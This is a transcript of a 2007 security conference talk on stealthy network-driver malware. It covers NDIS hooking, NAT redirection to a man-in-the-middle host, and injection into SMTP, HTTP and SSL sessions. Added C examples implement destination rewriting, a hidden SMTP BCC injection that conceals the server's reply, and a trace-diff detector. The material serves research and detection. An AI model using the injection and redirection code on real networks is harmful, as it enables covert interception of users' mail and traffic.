TCP/IP Perversion
Rares Stefan, Third Brigade Inc.
SecTor 2007

1 Introduction
- Perspective from a researcher focused on protecting hosts from malware
- Implementing kernel-based protection mechanisms
- Insight into a potential class of network driver malware

2 The Rise of Silent Malware
Three main areas of interest in malware R&D:
- Delivery and activation
- Hiding presence: rootkit techniques
- Evasion: minimize operating noise
  - Show no signs of activity on the infected system
  - Show no traces of network activity on the wire

3 Operational Challenges
- Operate on wire data
- Be active at a layer that guarantees transparency to the host
- Correctly perform inline IP reassembly and TCP stream reassembly
- Allow arbitrary injection/removal of data in TCP sessions

4 Operational Challenges, part deux
Maintain silence on the host:
- Never initiate TCP sessions
- Never receive TCP open-session requests
- Do not rely on TCP port splicing if the infected host is a server
- Do not rely on static motherships if the infected host is a workstation
- Packet modifications should not be easily visible in local network traces

5 Operational Challenges, part trois
Maintain silence on the wire:
- Only make use of legitimate TCP sessions
- Do not alter protocol semantics (resistance to network anomaly detection engines)
- Piggyback on encrypted channels (SSL) and on multiple TCP sessions for large data transfers

6 Driver Implementation (pre-Vista)
Stack diagram, top to bottom: user land; TDI; TCP/IP with the firewall (FW) hook and packet filter (PF) hook; NDIS / NDIS.SYS; intermediate driver; miniport driver. Callouts on the diagram:
- User land: never; access to the data stream, not to packets
- Some interesting areas; no guaranteed access to outbound payload
- NDIS hooking: some delivery challenges; most flexibility; driver signing issues; complete control over everything between the hardware drivers and the transport protocol

7 Rogue Network Driver Framework
- Firewall hook kernel module for basic packet header operations
- IM (intermediate) filter driver:
  - Inline IP reassembly
  - Inline TCP stream reassembly
  - TCP session normalization

8 Packet Header Modifications

9 Infected Workstation
Diagram: ALICE and BOB (10.0.1.26 and 10.0.1.124 in the demo captures), the server, and Alice's request https://server.
- Alice's driver, DNAT: DstIP_server -> DstIP_Bob
- Bob's driver, SNAT/DNAT (double NAT): SrcIP_Alice -> SrcIP_Bob, DstIP_Bob -> DstIP_server
- The translated request reaches the server

11 Infected Server
Diagram: ALICE (telnet server:80, https://server) and the server; the https request is served.
- Selective DN(P)AT on the server: SrcIP_Alice -> SrcIP_server, DstPort_443 -> DstPort_135

13 Packet Header Opportunities
- Passive covert channels:
  - http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf
  - http://www.ouah.org/neural_networks_vs_NUSHU.pdf
  - http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf
- Port splicing
- Most significant: communicating the original intent
  - DNAT on the outgoing SYN: change the destination address to that of the MIM
  - Insert the original dstIP in header fields
  - MIM double NAT

14 Why Payload Injection?
- Access to packet data
- High-bandwidth channel
- Bypasses application proxies
- Altering TCP data length on the wire is not trivial!
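The DNAT and double NAT on slides 9 to 13 are header rewrites that must leave the IP and TCP checksums valid, otherwise the translated packet is discarded before it reaches the server or the MIM. The C below is an added example, not code from the talk or from Third Brigade: it applies a destination address and port rewrite to a constructed IPv4/TCP SYN (the 10.0.1.26 and 10.0.1.124 addresses from the slide are reused as source and destination; 10.0.1.5:135 is an assumed target), patches both checksums incrementally per RFC 1624, and then cross-checks the result against a full recomputation, which is the check a driver author wants after every header rewrite. All function names are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HLEN  20
#define TCP_HLEN 20

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)(v >> 16)); wr16(p + 2, (uint16_t)v); }

/* One's-complement sum of big-endian 16-bit words; an odd trailing byte is padded with zero. */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc) {
    for (; n > 1; n -= 2, p += 2) acc += rd16(p);
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}
static uint16_t fold(uint32_t acc) {
    while (acc >> 16) acc = (acc & 0xffff) + (acc >> 16);
    return (uint16_t)acc;
}

/* Sum over the TCP pseudo-header plus the whole TCP segment (checksum field included). */
static uint32_t tcp_sum(const uint8_t *ip, size_t pkt_len) {
    uint8_t pseudo[12];
    uint16_t tcp_len = (uint16_t)(pkt_len - IP_HLEN);
    memcpy(pseudo, ip + 12, 8);   /* source and destination address */
    pseudo[8] = 0; pseudo[9] = 6; /* zero byte, protocol = TCP */
    wr16(pseudo + 10, tcp_len);
    return sum16(ip + IP_HLEN, tcp_len, sum16(pseudo, 12, 0));
}

/* A received checksum verifies when the sum over everything, checksum included, folds to 0xffff. */
static int ip_csum_ok(const uint8_t *ip) { return fold(sum16(ip, IP_HLEN, 0)) == 0xffff; }
static int tcp_csum_ok(const uint8_t *ip, size_t pkt_len) { return fold(tcp_sum(ip, pkt_len)) == 0xffff; }

/* RFC 1624 incremental update after replacing word m with m': HC' = ~(~HC + ~m + m'). */
static uint16_t csum_replace16(uint16_t hc, uint16_t old, uint16_t new_val) {
    uint32_t acc = (uint16_t)~hc;
    acc += (uint16_t)~old;
    acc += new_val;
    return (uint16_t)~fold(acc);
}
static uint16_t csum_replace32(uint16_t hc, uint32_t old, uint32_t new_val) {
    hc = csum_replace16(hc, (uint16_t)(old >> 16), (uint16_t)(new_val >> 16));
    return csum_replace16(hc, (uint16_t)old, (uint16_t)new_val);
}

/* Destination NAT plus port translation on an IPv4/TCP packet, in place. The IP checksum is
   patched for the address; the TCP checksum for the address (pseudo-header) and the port.
   Returns 0 on success, -1 if the packet is not plain IPv4/TCP without options. */
static int dnat_tcp(uint8_t *pkt, size_t len, uint32_t new_dst, uint16_t new_dport) {
    if (len < IP_HLEN + TCP_HLEN || pkt[0] != 0x45 || pkt[9] != 6 || rd16(pkt + 2) > len) return -1;
    uint8_t *tcp = pkt + IP_HLEN;
    uint32_t old_dst = rd32(pkt + 16);
    uint16_t old_dport = rd16(tcp + 2);
    uint16_t tc = rd16(tcp + 16);

    wr16(pkt + 10, csum_replace32(rd16(pkt + 10), old_dst, new_dst));
    wr32(pkt + 16, new_dst);

    tc = csum_replace32(tc, old_dst, new_dst);
    tc = csum_replace16(tc, old_dport, new_dport);
    wr16(tcp + 16, tc);
    wr16(tcp + 2, new_dport);
    return 0;
}

/* Constructed sample packet (not from the talk's captures): a SYN from 10.0.1.26:50000 to
   10.0.1.124:443, the two addresses on the slide, with both checksums computed from scratch. */
static size_t build_syn(uint8_t *buf, size_t cap) {
    if (cap < IP_HLEN + TCP_HLEN) return 0;
    memset(buf, 0, IP_HLEN + TCP_HLEN);
    buf[0] = 0x45; wr16(buf + 2, IP_HLEN + TCP_HLEN); wr16(buf + 4, 0x1234);
    buf[6] = 0x40; buf[8] = 64; buf[9] = 6;
    wr32(buf + 12, 0x0a00011aU); wr32(buf + 16, 0x0a00017cU);
    uint8_t *tcp = buf + IP_HLEN;
    wr16(tcp, 50000); wr16(tcp + 2, 443); wr32(tcp + 4, 0x11223344U);
    tcp[12] = 0x50; tcp[13] = 0x02; wr16(tcp + 14, 65535);
    wr16(buf + 10, (uint16_t)~fold(sum16(buf, IP_HLEN, 0)));
    wr16(tcp + 16, (uint16_t)~fold(tcp_sum(buf, IP_HLEN + TCP_HLEN)));
    return IP_HLEN + TCP_HLEN;
}

/* Build, translate, and cross-check the incremental checksums against a full recomputation.
   Returns 0 when every step agrees, otherwise the number of the step that failed. */
static int demo_dnat(uint32_t new_dst, uint16_t new_dport) {
    uint8_t pkt[64];
    size_t n = build_syn(pkt, sizeof pkt);
    if (n == 0 || !ip_csum_ok(pkt) || !tcp_csum_ok(pkt, n)) return 1;
    if (dnat_tcp(pkt, n, new_dst, new_dport) != 0) return 2;
    if (rd32(pkt + 16) != new_dst || rd16(pkt + IP_HLEN + 2) != new_dport) return 3;
    if (!ip_csum_ok(pkt) || !tcp_csum_ok(pkt, n)) return 4;
    return 0;
}

int main(void) {
    int rc = demo_dnat(0x0a000105U, 135);   /* 10.0.1.5:135 is an assumed, constructed target */
    printf("DNAT to 10.0.1.5:135 %s\n", rc == 0 ? "ok, checksums verify" : "FAILED");
    return rc;
}
```

The source-side rewrite on Bob (SNAT) is the same operation on bytes 12 to 15 and the source port; a payload that carries its own checksum or length (the slide's point about payload injection) is not covered by header patching alone.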
15 Inline Injection
- Support for IP reassembly on incoming traffic and IP fragmentation on outbound traffic
- Support for TCP stream reassembly: datagram reordering, injection of acknowledgements and resets, among other things

16 Inline TCP Reassembly
Maintain two edges (pre- and post-modification) of:
- ISN
- MaxSeq
- MaxAck
- Window
- Maximum SeqNo of filtered data
- Maximum AckNo of filtered data
- Queue/counter for non-ACKed datagrams
- Queue/counter for not-yet-sent datagrams
- Needed window scale
- Actual window scale

17 SMTP Injection: Eliminating Bob from the Equation
- Reduces the complexity of the MIM and of random redirection
- Works with application-level proxies
- Replace the RCPT TO argument, or inject an additional RCPT TO (BCC)
- Increases the probability of detection: SMTP server logs

18 SMTP Injection
Diagram: Alice sends Bob a message; the driver injects a BCC to Eva; the SMTP server delivers; Bob receives the original message, and so does Eva.

19 SMTP Injection Demo (Vid1)

20-21 (demo slides)

22 HTTP Injection
- TCP headers are useless here: need to find a workaround
- Easy workaround, but we need to be careful:
  - Transparent proxies (the initial HTTP request looks normal, so we'll always assume we may be transparently "proxied")
  - Direct proxies: easy to spot in HTTP(S) requests
- URI and headers will help us redirect/leak data
- Make use of the Authorization and Cookie headers: they won't be scrubbed
- POST data also presents injection opportunities

23 HTTP Injection
Diagram: ALICE requests http://www.google.com; the request passes a web proxy with content filtering; "Change request; inject data"; BOB; google.com.

25 SSL Injection Demo
Diagram: ALICE requests https://somebank.com; perimeter security; "Inject data"; BOB; somebank.com.

27 SSL: Alice browser video

28 Detecting Network Driver Malware
Conventional detection mechanisms:
- AV, AS signatures; configuration management
New detection mechanisms:
- Traffic-based detection?
  - Malicious destinations, ISN analysis
- Network trace diff: local vs. remote
- NDIS-based sniffer for better visibility?
Other:
- Host-based application control is ineffective
- DLP? ...

29 Conclusions
- Passive kernel malware is difficult to spot
- There are significant implementation challenges for coders
- Prevention remains the key approach

30 Thank You

Backup slides (31-67), demo captures and screenshots:
- Infected Workstation: Alice browser capture; Alice-Bob network traces; Alice driver SNAT; Alice SNAT; Bob double NAT
- Infected Server: server network trace; server SNAT & DPAT
- HTTP Injection: Alice browser video; Alice network trace; Alice original data; Alice driver work; Bob driver work; Bob modified request
- SSL Injection: Alice original data; post-insert wire noise!; Alice SSL clean; Bob post-modification, clean!!
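Slides 14 to 18 make the point that changing the TCP data length on the wire is the hard part of payload injection: every later sequence number in that direction and every acknowledgement coming back must be translated, and the server's reply to the injected command must be removed so the host's own stack never sees a reply it did not ask for. The C below is an added example, not the talk's driver code, that carries the SMTP BCC case through with the two edges slide 16 describes (host view and wire view) under stated simplifications: one injection per flow, in-order segments, and reply lines that do not straddle segment boundaries. The recipient eva@example.test, the sequence numbers and the server replies are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SEG 512

/* A TCP segment as the driver sees it; only the fields the rewrite touches. */
struct seg { uint32_t seq, ack; size_t len; uint8_t data[MAX_SEG]; };

/* Per-flow translation state: for each direction, the point where the wire view and the host
   view of the byte stream diverge, and by how much. One injection per flow is supported here;
   the talk's driver keeps queues of such edges. */
struct flow {
    uint32_t out_cut, out_delta;  /* host bytes >= out_cut appear out_delta later on the wire */
    uint32_t in_cut,  in_delta;   /* wire bytes >= in_cut + in_delta reach the host in_delta earlier */
    int pending_reply;            /* the server's reply to the injected command still has to be hidden */
    int reply_lines;              /* reply lines seen since the injection */
};

static const char INJECT[] = "RCPT TO:<eva@example.test>\r\n"; /* constructed BCC recipient */

static int seq_ge(uint32_t a, uint32_t b) { return (int32_t)(a - b) >= 0; } /* modular compare */

/* Host -> wire. Called on every outbound segment after the host's stack has built it. */
static void host_to_wire(struct flow *f, struct seg *s) {
    int first = (f->out_delta == 0);
    if (f->out_delta && seq_ge(s->seq, f->out_cut)) s->seq += f->out_delta; /* shift past injection */
    if (f->in_delta && seq_ge(s->ack, f->in_cut)) s->ack += f->in_delta;    /* also ack the bytes we stripped */
    /* Inject an extra recipient right after the host's own RCPT TO line. */
    if (first && s->len >= 8 && memcmp(s->data, "RCPT TO:", 8) == 0 && s->data[s->len - 1] == '\n'
        && s->len + sizeof INJECT - 1 <= MAX_SEG) {
        memcpy(s->data + s->len, INJECT, sizeof INJECT - 1);
        f->out_cut = s->seq + (uint32_t)s->len;
        f->out_delta = (uint32_t)(sizeof INJECT - 1);
        s->len += f->out_delta;
        f->pending_reply = 1;
        f->reply_lines = 0;
    }
}

/* Wire -> host. Called on every inbound segment before the host's stack sees it. */
static void wire_to_host(struct flow *f, struct seg *s) {
    if (f->out_delta) {
        if (seq_ge(s->ack, f->out_cut + f->out_delta)) s->ack -= f->out_delta; /* past the injection */
        else if (seq_ge(s->ack, f->out_cut)) s->ack = f->out_cut;             /* inside the injection */
    }
    if (f->in_delta && seq_ge(s->seq, f->in_cut + f->in_delta)) s->seq -= f->in_delta;
    /* Hide the reply to the injected RCPT TO: it is the second reply line after the injection.
       Simplification: reply lines are assumed not to straddle segment boundaries. */
    if (f->pending_reply) {
        size_t i = 0;
        while (i < s->len) {
            size_t j = i;
            while (j < s->len && s->data[j] != '\n') j++;
            if (j == s->len) break;
            j++;
            if (f->reply_lines++ == 1) {
                f->in_cut = s->seq + (uint32_t)i;
                f->in_delta = (uint32_t)(j - i);
                memmove(s->data + i, s->data + j, s->len - j);
                s->len -= j - i;            /* may leave a pure ACK, which is still a valid segment */
                f->pending_reply = 0;
                break;
            }
            i = j;
        }
    }
}

static void mk_seg(struct seg *s, uint32_t seq, uint32_t ack, const char *payload) {
    memset(s, 0, sizeof *s);
    s->seq = seq; s->ack = ack; s->len = strlen(payload);
    memcpy(s->data, payload, s->len);
}

/* Constructed exchange (not the talk's capture): Alice's stack at seq 1000 / ack 5000, mid-session
   after MAIL FROM. Returns 0 if every translated value is what the host and the server must see. */
static int demo_smtp_bcc(void) {
    struct flow f; struct seg s;
    memset(&f, 0, sizeof f);
    mk_seg(&s, 1000, 5000, "RCPT TO:<bob@example.test>\r\n");   /* 28 bytes from the host */
    host_to_wire(&f, &s);
    if (s.len != 56 || s.seq != 1000) return 1;                  /* 56 bytes on the wire */
    mk_seg(&s, 5000, 1056, "250 OK\r\n250 OK\r\n");                /* server acks all 56, replies twice */
    wire_to_host(&f, &s);
    if (s.ack != 1028 || s.len != 8) return 2;                   /* host sees 28 acked and one reply */
    mk_seg(&s, 1028, 5008, "DATA\r\n");
    host_to_wire(&f, &s);
    if (s.seq != 1056 || s.ack != 5016) return 3;                /* both numbers shifted on the wire */
    mk_seg(&s, 5016, 1062, "354 go ahead\r\n");
    wire_to_host(&f, &s);
    if (s.seq != 5008 || s.ack != 1034) return 4;                /* both numbers shifted back for the host */
    return 0;
}

int main(void) {
    int rc = demo_smtp_bcc();
    printf("SMTP BCC injection with seq/ack translation: %s\n", rc == 0 ? "consistent" : "FAILED");
    return rc;
}
```

The stripped reply is what slide 17 alludes to with "increases the probability of detection": the SMTP server still logs the extra recipient, and the wire still carries 28 more bytes than the host's stack sent, which is exactly what a local-versus-remote trace diff picks up. Window accounting, retransmissions and out-of-order segments (the queues and counters on slide 16) are left out here.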
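Slide 28 proposes diffing a trace taken on the host against one taken on the wire: a driver below the host's capture point leaves the local trace looking normal, so the divergence shows up only in a remote capture. The C below is an added example, not from the talk, of the per-flow comparison behind that idea. The flow summaries (addresses, ports and payload byte counts) are constructed for one host, with one HTTPS flow redirected by DNAT and one SMTP flow carrying 28 injected bytes; in practice the records would be extracted from two pcap files.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Per-flow summary extracted from a capture: who talked to whom and how many payload bytes flowed. */
struct flowsum { uint32_t src, dst; uint16_t sport, dport; uint32_t payload_bytes; };

enum verdict { FLOW_OK = 0, MISSING_ON_WIRE, EXTRA_ON_WIRE, SIZE_MISMATCH };

static int same_tuple(const struct flowsum *a, const struct flowsum *b) {
    return a->src == b->src && a->dst == b->dst && a->sport == b->sport && a->dport == b->dport;
}

/* Compare the host's own view (capture taken on the host) with a capture of the same host taken on
   the wire, e.g. from a SPAN port. A flow the host logged but the wire never saw, a flow on the wire
   the host never sent, and a flow whose byte count differs are each reported. Returns the number of
   findings; verdicts[] (size cap) receives one entry per host flow, then one per unmatched wire flow. */
static size_t trace_diff(const struct flowsum *host, size_t nh, const struct flowsum *wire, size_t nw,
                         enum verdict *verdicts, size_t cap) {
    size_t findings = 0, k = 0;
    for (size_t i = 0; i < nh; i++) {
        enum verdict v = MISSING_ON_WIRE;
        for (size_t j = 0; j < nw; j++)
            if (same_tuple(&host[i], &wire[j])) {
                v = host[i].payload_bytes == wire[j].payload_bytes ? FLOW_OK : SIZE_MISMATCH;
                break;
            }
        if (k < cap) verdicts[k++] = v;
        if (v != FLOW_OK) findings++;
    }
    for (size_t j = 0; j < nw; j++) {
        int seen = 0;
        for (size_t i = 0; i < nh && !seen; i++) seen = same_tuple(&host[i], &wire[j]);
        if (!seen) { if (k < cap) verdicts[k++] = EXTRA_ON_WIRE; findings++; }
    }
    return findings;
}

/* Constructed captures for one host (10.0.1.26): the host believes it opened an HTTPS session to
   10.0.1.124 and sent a 120-byte SMTP transaction to 10.0.1.25. The wire shows the HTTPS session
   going to 10.0.1.5 instead (DNAT in the driver) and 28 extra bytes in the SMTP session. */
static size_t demo_trace_diff(void) {
    const struct flowsum host[] = {
        { 0x0a00011aU, 0x0a00017cU, 50000, 443, 500 },
        { 0x0a00011aU, 0x0a000119U, 50001,  25, 120 },
    };
    const struct flowsum wire[] = {
        { 0x0a00011aU, 0x0a000105U, 50000, 443, 500 },
        { 0x0a00011aU, 0x0a000119U, 50001,  25, 148 },
    };
    enum verdict v[4];
    size_t n = trace_diff(host, 2, wire, 2, v, 4);
    static const char *names[] = { "ok", "missing on wire", "extra on wire", "size mismatch" };
    for (size_t i = 0; i < 3; i++) printf("flow %zu: %s\n", i, names[v[i]]);
    return n;   /* 3 findings: HTTPS missing, SMTP size mismatch, redirected HTTPS extra on the wire */
}

int main(void) { printf("%zu findings\n", demo_trace_diff()); return 0; }
```

Byte counts alone are a coarse signal (retransmissions and TCP options change lengths without any injection); comparing sequence-number ranges per direction, or the ISN values slide 28 mentions, tightens the check, and the remote capture must be taken somewhere the infected host's driver cannot touch.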